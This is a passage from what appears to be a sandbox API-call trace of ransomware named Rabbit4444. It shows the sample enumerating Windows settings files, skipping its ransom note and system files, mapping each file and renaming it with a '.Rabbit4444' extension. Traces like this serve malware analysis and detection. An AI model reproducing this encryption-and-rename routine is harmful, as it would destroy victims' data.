"c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_powerandsleep_displayofftimeoutac_aoac.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC_AoAc.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_powerandsleep_displayofftimeoutac_aoac.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.888] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x356816b4, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x356816b4, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a287a5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x520, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC.settingcontent-ms", cAlternateFileName="AAB4AA~1.SET")) returned 1 [0057.888] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.888] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.888] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.888] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC.settingcontent-ms", lpString2=".") returned 1 [0057.888] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC.settingcontent-ms", lpString2="..") returned 1 [0057.888] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC.settingcontent-ms", lpString2="windows") returned -1 [0057.888] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.888] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.888] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC.settingcontent-ms", lpString2="boot") returned -1 [0057.888] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.888] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.888] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC.settingcontent-ms" | out: lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC.settingcontent-ms") returned="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC.settingcontent-ms" [0057.888] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.888] lstrlenW (lpString="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC.settingcontent-ms") returned 70 [0057.888] lstrlenW (lpString="Rabbit4444") returned 10 [0057.888] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.888] lstrlenW (lpString=".dll") returned 4 [0057.888] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.888] lstrlenW (lpString=".lnk") returned 4 [0057.888] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.888] lstrlenW (lpString=".ini") returned 4 [0057.888] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.888] lstrlenW (lpString=".sys") returned 4 [0057.888] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.889] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_powerandsleep_displayofftimeoutdc.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.889] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.889] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14919955511) returned 1 [0057.889] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1312) returned 1 [0057.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0057.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0057.889] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x820, lpName=0x0) returned 0x298 [0057.890] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x820) returned 0x70000 [0057.891] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.891] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0057.891] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.891] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0057.891] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.891] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0057.891] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.891] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0057.891] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14920210063) returned 1 [0057.891] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0057.891] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0057.891] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.892] CloseHandle (hObject=0x298) returned 1 [0057.892] CloseHandle (hObject=0x278) returned 1 [0057.892] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC.settingcontent-ms.Rabbit4444") returned 198 [0057.892] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_powerandsleep_displayofftimeoutdc.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_powerandsleep_displayofftimeoutdc.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.893] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x357b299e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x357b299e, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23969bec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x53d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC_AoAc.settingcontent-ms", cAlternateFileName="AA92D7~1.SET")) returned 1 [0057.893] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC_AoAc.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.893] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC_AoAc.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.893] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC_AoAc.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.893] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC_AoAc.settingcontent-ms", lpString2=".") returned 1 [0057.893] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC_AoAc.settingcontent-ms", lpString2="..") returned 1 [0057.893] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC_AoAc.settingcontent-ms", lpString2="windows") returned -1 [0057.893] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC_AoAc.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.893] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC_AoAc.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.893] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC_AoAc.settingcontent-ms", lpString2="boot") returned -1 [0057.893] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC_AoAc.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.893] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC_AoAc.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.893] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC_AoAc.settingcontent-ms" | out: lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC_AoAc.settingcontent-ms") returned="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC_AoAc.settingcontent-ms" [0057.893] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC_AoAc.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.894] lstrlenW (lpString="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC_AoAc.settingcontent-ms") returned 75 [0057.894] lstrlenW (lpString="Rabbit4444") returned 10 [0057.894] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.894] lstrlenW (lpString=".dll") returned 4 [0057.894] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.894] lstrlenW (lpString=".lnk") returned 4 [0057.894] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.894] lstrlenW (lpString=".ini") returned 4 [0057.894] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.894] lstrlenW (lpString=".sys") returned 4 [0057.894] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.894] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC_AoAc.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_powerandsleep_displayofftimeoutdc_aoac.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.894] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.894] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14920509305) returned 1 [0057.894] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1341) returned 1 [0057.894] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0057.894] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0057.895] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x840, lpName=0x0) returned 0x298 [0057.896] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x840) returned 0x70000 [0057.896] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.896] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0057.896] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.896] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0057.896] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.897] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0057.897] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.897] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0057.897] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14920745385) returned 1 [0057.897] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0057.897] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0057.897] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.897] CloseHandle (hObject=0x298) returned 1 [0057.897] CloseHandle (hObject=0x278) returned 1 [0057.897] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC_AoAc.settingcontent-ms.Rabbit4444") returned 203 [0057.897] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC_AoAc.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_powerandsleep_displayofftimeoutdc_aoac.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutDC_AoAc.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_powerandsleep_displayofftimeoutdc_aoac.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.898] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35897744, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x35897744, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2398fe3f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x502, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_PowerAndSleep_SleepTimeoutAC.settingcontent-ms", cAlternateFileName="AA98AC~1.SET")) returned 1 [0057.898] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_SleepTimeoutAC.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.898] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_SleepTimeoutAC.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.898] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_SleepTimeoutAC.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.898] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_SleepTimeoutAC.settingcontent-ms", lpString2=".") returned 1 [0057.898] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_SleepTimeoutAC.settingcontent-ms", lpString2="..") returned 1 [0057.898] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_SleepTimeoutAC.settingcontent-ms", lpString2="windows") returned -1 [0057.898] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_SleepTimeoutAC.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.898] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_SleepTimeoutAC.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.898] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_SleepTimeoutAC.settingcontent-ms", lpString2="boot") returned -1 [0057.898] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_SleepTimeoutAC.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.898] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_SleepTimeoutAC.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.898] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_PowerAndSleep_SleepTimeoutAC.settingcontent-ms" | out: lpString1="AAA_SystemSettings_PowerAndSleep_SleepTimeoutAC.settingcontent-ms") returned="AAA_SystemSettings_PowerAndSleep_SleepTimeoutAC.settingcontent-ms" [0057.898] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PowerAndSleep_SleepTimeoutAC.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.899] lstrlenW (lpString="AAA_SystemSettings_PowerAndSleep_SleepTimeoutAC.settingcontent-ms") returned 65 [0057.899] lstrlenW (lpString="Rabbit4444") returned 10 [0057.899] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.899] lstrlenW (lpString=".dll") returned 4 [0057.899] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.899] lstrlenW (lpString=".lnk") returned 4 [0057.899] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.899] lstrlenW (lpString=".ini") returned 4 [0057.899] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.899] lstrlenW (lpString=".sys") returned 4 [0057.899] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.899] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PowerAndSleep_SleepTimeoutAC.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_powerandsleep_sleeptimeoutac.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.899] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.899] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14920997132) returned 1 [0057.899] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1282) returned 1 [0057.899] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0057.899] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0057.899] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x810, lpName=0x0) returned 0x298 [0057.900] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x810) returned 0x70000 [0057.901] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.901] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0057.901] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.901] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0057.901] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.902] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0057.902] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.902] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0057.902] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14921251503) returned 1 [0057.902] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0057.902] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0057.902] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.902] CloseHandle (hObject=0x298) returned 1 [0057.902] CloseHandle (hObject=0x278) returned 1 [0057.902] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PowerAndSleep_SleepTimeoutAC.settingcontent-ms.Rabbit4444") returned 193 [0057.902] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PowerAndSleep_SleepTimeoutAC.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_powerandsleep_sleeptimeoutac.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PowerAndSleep_SleepTimeoutAC.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_powerandsleep_sleeptimeoutac.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.903] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35b46213, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x35b46213, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x233e650b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x502, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_PowerAndSleep_SleepTimeoutDC.settingcontent-ms", cAlternateFileName="AACF0D~1.SET")) returned 1 [0057.903] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_SleepTimeoutDC.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.903] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_SleepTimeoutDC.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.903] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_SleepTimeoutDC.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.903] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_SleepTimeoutDC.settingcontent-ms", lpString2=".") returned 1 [0057.903] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_SleepTimeoutDC.settingcontent-ms", lpString2="..") returned 1 [0057.903] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_SleepTimeoutDC.settingcontent-ms", lpString2="windows") returned -1 [0057.903] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_SleepTimeoutDC.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.903] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_SleepTimeoutDC.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.903] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_SleepTimeoutDC.settingcontent-ms", lpString2="boot") returned -1 [0057.903] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_SleepTimeoutDC.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.903] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_SleepTimeoutDC.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.903] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_PowerAndSleep_SleepTimeoutDC.settingcontent-ms" | out: lpString1="AAA_SystemSettings_PowerAndSleep_SleepTimeoutDC.settingcontent-ms") returned="AAA_SystemSettings_PowerAndSleep_SleepTimeoutDC.settingcontent-ms" [0057.903] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PowerAndSleep_SleepTimeoutDC.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.904] lstrlenW 